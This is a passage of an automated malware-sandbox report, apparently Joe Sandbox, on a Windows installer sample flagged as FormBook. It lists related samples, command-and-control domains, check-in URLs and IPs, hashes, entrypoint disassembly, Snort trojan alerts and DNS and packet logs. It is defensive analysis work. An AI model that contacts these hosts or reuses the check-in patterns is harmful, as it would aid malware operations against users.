                                                                                    aQnaI0DXH8l8WfB.exeGet hashmaliciousBrowse
                                                                                    • www.queendreea.club/uszn/?hBZ=LBz6fxh7cOEoWCvBq3hoHfpfB4+EiRnODdzRnTIzYKazzCL+4dFO4b8BXlNrSrzf6UfZ&Wr=LhnLHrv82
                                                                                    Proforma Invoice_pdf_exe.exeGet hashmaliciousBrowse
                                                                                    • www.716hairvault.com/d833/?FnmpG=9ruItk6c2Z/kZuoLN1i47F+GDs8vBByUohgB3wBKdmiJ4kgDRQ+pdmLVThWcaVNAmy3g&alI=J6AheNuHu6I
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    www.856380692.xyzLdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    b2lTHeTto0.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    PO 120610361.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    JJux8lxZRj.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    G6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                    • 103.88.34.80
                                                                                    www.myfeezinc.comG6FkfjX5Ow.exeGet hashmaliciousBrowse
                                                                                    • 103.224.182.242
                                                                                    www.usopencoverage.comLdryowLXJB.exeGet hashmaliciousBrowse
                                                                                    • 94.136.40.51
                                                                                    U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                                                    • 94.136.40.51
                                                                                    www.worldsourcecloud.comHBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                    • 104.21.78.148
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    CLOUDFLARENETUSPI_2994_Feb 2021.xlsxGet hashmaliciousBrowse
                                                                                    • 172.67.183.193
                                                                                    NEW_ORDER_Hr02715499.exeGet hashmaliciousBrowse
                                                                                    • 104.21.78.8
                                                                                    Quotation 1.PDF______________________________________.exeGet hashmaliciousBrowse
                                                                                    • 172.67.179.188
                                                                                    REQUEST FOR QUOTATION 4675674665.exeGet hashmaliciousBrowse
                                                                                    • 172.67.179.188
C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll
Process: C:\Users\user\Desktop\Nz7NA3F7z7.exe
File Type: PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 176128
Entropy (8bit): 7.971614479763184
Encrypted: false
SSDEEP: 3072:95WI46AkCIXhdko1AN8MwbvB9pLUvMIeHoZGCCY0E41LyJDvrHHXRMt2oLLq5TyT:9kIdfiKMS9pQkI5Z41eJvqt24L2Pi
MD5: 814667786976E62B068D1AF3ED8CCDDE
SHA1: 8A1987B2898F5B4B4CA70C0878A26EAED9EBF9FE
SHA-256: AB8C33787270929DF3827A53DF0C17D4EA962602A3FEDDD01586F7ABC679758A
SHA-512: F9FC7F0473FFFA2516951BF15F9C076F206667F121A692F6D93B0733344D1D02CC320FB4D29FD6B8E0B24AE65200050DBDC4807FF984193CA07A82BED56668E4
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B............aW8.....aW=.............%.......%.......%.......%.......Rich............PE..L...Q.?`...........!.........&............... ...............................p............@A......................... ..T....!.......P.......................`..X.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..B.reloc..X....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.900612739713547
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Nz7NA3F7z7.exe
File size: 223664
MD5: 059a1308ebdfae6ee52fd646d341aeac
SHA1: 4bea37c03b3e0ad1ccdea6675819f363c881bf39
SHA256: ff9b0f1788f165edd1e2811c182a990a352a12453706f85d90eaac2601597862
SHA512: 32f11ec1c9879595f8f27b26993a6836e88e9d4ec70b4edcf4966078d5ce6d2e736b16cf642966ef76ebad3f09610dd20c0538638493f25b67351da08bcd1552
SSDEEP: 6144:l8LxBjiTyzV71F8FIdfiKMSSpQkIOZ41eJMqt24L2Qi:0tVDqIFiKMSSpTIOZNOqt2Gq
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

File Icon

Icon Hash: 00828e8e8686b000

General

Entrypoint: 0x40312a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b76363e9cb88bf9390860da8e50999d2
Instruction (disassembly at entrypoint)
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F01748AFEC3h
push ebx
call 00007F01748B2CA4h
cmp eax, ebx
je 00007F01748AFEB9h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007F01748B2C20h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F01748AFE9Dh
push 0000000Dh
call 00007F01748B2C78h
push 0000000Bh
call 00007F01748B2C71h
mov dword ptr [0042EC24h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [0042ECD8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429058h
call dword ptr [0040715Ch]
push 0040915Ch
push 0042E420h
call 00007F01748B28A4h
call dword ptr [0040710Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F01748B2892h
push ebx
call dword ptr [00407144h]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7524 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x648 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e66 | 0x6000 | False | 0.670572916667 | data | 6.44065573436 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x12a2 | 0x1400 | False | 0.4455078125 | data | 5.0583287871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25d18 | 0x600 | False | 0.458984375 | data | 4.18773476617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x648 | 0x800 | False | 0.38427734375 | data | 3.87782977991 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_DIALOG | 0x37100 | 0x100 | data | English | United States
RT_DIALOG | 0x37200 | 0x11c | data | English | United States
RT_DIALOG | 0x3731c | 0x60 | data | English | United States
RT_MANIFEST | 0x3737c | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/03/21-08:08:07.990852 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49728 | 172.67.223.7 | 192.168.2.3
03/03/21-08:08:49.862537 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.3 | 184.168.131.241
03/03/21-08:08:49.862537 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.3 | 184.168.131.241
03/03/21-08:08:49.862537 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49739 | 80 | 192.168.2.3 | 184.168.131.241
03/03/21-08:09:11.130257 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 34.102.136.180
03/03/21-08:09:11.130257 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 34.102.136.180
03/03/21-08:09:11.130257 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 34.102.136.180
03/03/21-08:09:11.269534 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49742 | 34.102.136.180 | 192.168.2.3
03/03/21-08:09:22.671721 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 91.195.240.94
03/03/21-08:09:22.671721 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 91.195.240.94
03/03/21-08:09:22.671721 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 91.195.240.94

Network Port Distribution

• Total Packets: 69
• 80 (HTTP)
• 53 (DNS)

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 3, 2021 08:08:07.740595102 CET | 49728 | 80 | 192.168.2.3 | 172.67.223.7
Mar 3, 2021 08:08:07.799659967 CET | 80 | 49728 | 172.67.223.7 | 192.168.2.3
Mar 3, 2021 08:08:07.799824953 CET | 49728 | 80 | 192.168.2.3 | 172.67.223.7
Mar 3, 2021 08:08:07.800009966 CET | 49728 | 80 | 192.168.2.3 | 172.67.223.7
Mar 3, 2021 08:08:07.861560106 CET | 80 | 49728 | 172.67.223.7 | 192.168.2.3
Mar 3, 2021 08:08:07.990852118 CET | 80 | 49728 | 172.67.223.7 | 192.168.2.3
Mar 3, 2021 08:08:07.990875006 CET | 80 | 49728 | 172.67.223.7 | 192.168.2.3
Mar 3, 2021 08:08:07.990883112 CET | 80 | 49728 | 172.67.223.7 | 192.168.2.3
Mar 3, 2021 08:08:07.991092920 CET | 49728 | 80 | 192.168.2.3 | 172.67.223.7
Mar 3, 2021 08:08:07.991147995 CET | 49728 | 80 | 192.168.2.3 | 172.67.223.7
Mar 3, 2021 08:08:07.991221905 CET | 49728 | 80 | 192.168.2.3 | 172.67.223.7
Mar 3, 2021 08:08:13.374650955 CET | 49729 | 80 | 192.168.2.3 | 103.88.34.80
Mar 3, 2021 08:08:16.398051023 CET | 49729 | 80 | 192.168.2.3 | 103.88.34.80
Mar 3, 2021 08:08:22.399024963 CET | 49729 | 80 | 192.168.2.3 | 103.88.34.80
Mar 3, 2021 08:08:36.715867996 CET | 49736 | 80 | 192.168.2.3 | 103.88.34.80
Mar 3, 2021 08:08:39.728146076 CET | 49736 | 80 | 192.168.2.3 | 103.88.34.80
Mar 3, 2021 08:08:45.728641987 CET | 49736 | 80 | 192.168.2.3 | 103.88.34.80
Mar 3, 2021 08:08:49.676316023 CET | 49739 | 80 | 192.168.2.3 | 184.168.131.241
Mar 3, 2021 08:08:49.859278917 CET | 80 | 49739 | 184.168.131.241 | 192.168.2.3
Mar 3, 2021 08:08:49.862329006 CET | 49739 | 80 | 192.168.2.3 | 184.168.131.241
Mar 3, 2021 08:08:49.862536907 CET | 49739 | 80 | 192.168.2.3 | 184.168.131.241
Mar 3, 2021 08:08:50.045519114 CET | 80 | 49739 | 184.168.131.241 | 192.168.2.3
Mar 3, 2021 08:08:50.060493946 CET | 80 | 49739 | 184.168.131.241 | 192.168.2.3
Mar 3, 2021 08:08:50.060524940 CET | 80 | 49739 | 184.168.131.241 | 192.168.2.3
Mar 3, 2021 08:08:50.060736895 CET | 49739 | 80 | 192.168.2.3 | 184.168.131.241
Mar 3, 2021 08:08:50.060825109 CET | 49739 | 80 | 192.168.2.3 | 184.168.131.241
Mar 3, 2021 08:08:50.243590117 CET | 80 | 49739 | 184.168.131.241 | 192.168.2.3
Mar 3, 2021 08:08:55.167289972 CET | 49740 | 80 | 192.168.2.3 | 217.160.0.236
Mar 3, 2021 08:08:55.211918116 CET | 80 | 49740 | 217.160.0.236 | 192.168.2.3
Mar 3, 2021 08:08:55.212555885 CET | 49740 | 80 | 192.168.2.3 | 217.160.0.236
Mar 3, 2021 08:08:55.212816954 CET | 49740 | 80 | 192.168.2.3 | 217.160.0.236
Mar 3, 2021 08:08:55.256674051 CET | 80 | 49740 | 217.160.0.236 | 192.168.2.3
Mar 3, 2021 08:08:55.259952068 CET | 80 | 49740 | 217.160.0.236 | 192.168.2.3
Mar 3, 2021 08:08:55.259985924 CET | 80 | 49740 | 217.160.0.236 | 192.168.2.3
Mar 3, 2021 08:08:55.260194063 CET | 49740 | 80 | 192.168.2.3 | 217.160.0.236
Mar 3, 2021 08:08:55.260270119 CET | 49740 | 80 | 192.168.2.3 | 217.160.0.236
Mar 3, 2021 08:08:55.303860903 CET | 80 | 49740 | 217.160.0.236 | 192.168.2.3
Mar 3, 2021 08:09:00.475367069 CET | 49741 | 80 | 192.168.2.3 | 170.178.168.203
Mar 3, 2021 08:09:00.671402931 CET | 80 | 49741 | 170.178.168.203 | 192.168.2.3
Mar 3, 2021 08:09:00.671519041 CET | 49741 | 80 | 192.168.2.3 | 170.178.168.203
Mar 3, 2021 08:09:00.671694040 CET | 49741 | 80 | 192.168.2.3 | 170.178.168.203
Mar 3, 2021 08:09:00.904683113 CET | 80 | 49741 | 170.178.168.203 | 192.168.2.3
Mar 3, 2021 08:09:00.905263901 CET | 49741 | 80 | 192.168.2.3 | 170.178.168.203
Mar 3, 2021 08:09:00.905339003 CET | 49741 | 80 | 192.168.2.3 | 170.178.168.203
Mar 3, 2021 08:09:01.101613045 CET | 80 | 49741 | 170.178.168.203 | 192.168.2.3
Mar 3, 2021 08:09:11.090845108 CET | 49742 | 80 | 192.168.2.3 | 34.102.136.180
Mar 3, 2021 08:09:11.129087925 CET | 80 | 49742 | 34.102.136.180 | 192.168.2.3
Mar 3, 2021 08:09:11.129565001 CET | 49742 | 80 | 192.168.2.3 | 34.102.136.180
Mar 3, 2021 08:09:11.130256891 CET | 49742 | 80 | 192.168.2.3 | 34.102.136.180
Mar 3, 2021 08:09:11.170927048 CET | 80 | 49742 | 34.102.136.180 | 192.168.2.3
Mar 3, 2021 08:09:11.269534111 CET | 80 | 49742 | 34.102.136.180 | 192.168.2.3
Mar 3, 2021 08:09:11.269556999 CET | 80 | 49742 | 34.102.136.180 | 192.168.2.3
Mar 3, 2021 08:09:11.269769907 CET | 49742 | 80 | 192.168.2.3 | 34.102.136.180
Mar 3, 2021 08:09:12.390512943 CET | 49742 | 80 | 192.168.2.3 | 34.102.136.180
Mar 3, 2021 08:09:12.428850889 CET | 80 | 49742 | 34.102.136.180 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 3, 2021 08:07:02.572189093 CET | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:02.584414959 CET | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:02.618140936 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:02.727171898 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:02.775921106 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:10.663738966 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:10.712168932 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:12.135627985 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:12.184562922 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:13.709917068 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:13.755708933 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:14.843909979 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:14.892151117 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:16.039441109 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:16.085133076 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:16.981811047 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:17.030885935 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:18.154320002 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:18.200314999 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:19.414899111 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:19.460747004 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:21.261106014 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:21.320060968 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:22.392802000 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:22.438838959 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:23.195377111 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:23.241329908 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:28.459887981 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:28.511447906 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:30.506838083 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:30.552999020 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:31.961904049 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:32.008941889 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:33.387892008 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:33.446693897 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:33.462146997 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:33.510962963 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:34.411458015 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:34.457672119 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:35.313247919 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:35.360244036 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:37.378763914 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:37.427367926 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:07:58.059210062 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:07:58.104897022 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:07.659733057 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:07.734126091 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:13.012520075 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:13.373378038 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:16.470212936 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:16.525774956 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:20.447416067 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:20.517450094 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:36.610662937 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:36.667924881 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:39.451970100 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:39.527894974 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:44.546364069 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:44.610312939 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:47.287533998 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:47.334961891 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:49.329098940 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:49.383326054 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:49.627070904 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:49.674992085 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:08:55.108767986 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:08:55.164676905 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:09:00.266472101 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:09:00.473987103 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:09:10.974236012 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:09:11.034506083 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:09:17.404759884 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:09:17.462021112 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Mar 3, 2021 08:09:22.577244997 CET | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Mar 3, 2021 08:09:22.627926111 CET | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 3, 2021 08:08:07.659733057 CET | 192.168.2.3 | 8.8.8.8 | 0xf3d8 | Standard query (0) | www.worldsourcecloud.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:13.012520075 CET | 192.168.2.3 | 8.8.8.8 | 0x16ec | Standard query (0) | www.856380692.xyz | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:36.610662937 CET | 192.168.2.3 | 8.8.8.8 | 0x1360 | Standard query (0) | www.856380692.xyz | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:39.451970100 CET | 192.168.2.3 | 8.8.8.8 | 0x8719 | Standard query (0) | www.clericallyco.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:44.546364069 CET | 192.168.2.3 | 8.8.8.8 | 0x2596 | Standard query (0) | www.evoslancete.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:49.627070904 CET | 192.168.2.3 | 8.8.8.8 | 0x5891 | Standard query (0) | www.tencenttexts.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:55.108767986 CET | 192.168.2.3 | 8.8.8.8 | 0x538e | Standard query (0) | www.glowtheblog.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:00.266472101 CET | 192.168.2.3 | 8.8.8.8 | 0x95b8 | Standard query (0) | www.myfeezinc.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:10.974236012 CET | 192.168.2.3 | 8.8.8.8 | 0xd80d | Standard query (0) | www.wholesalerbargains.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:17.404759884 CET | 192.168.2.3 | 8.8.8.8 | 0x2c1d | Standard query (0) | www.usopencoverage.com | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:22.577244997 CET | 192.168.2.3 | 8.8.8.8 | 0xe852 | Standard query (0) | www.explorerthecity.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
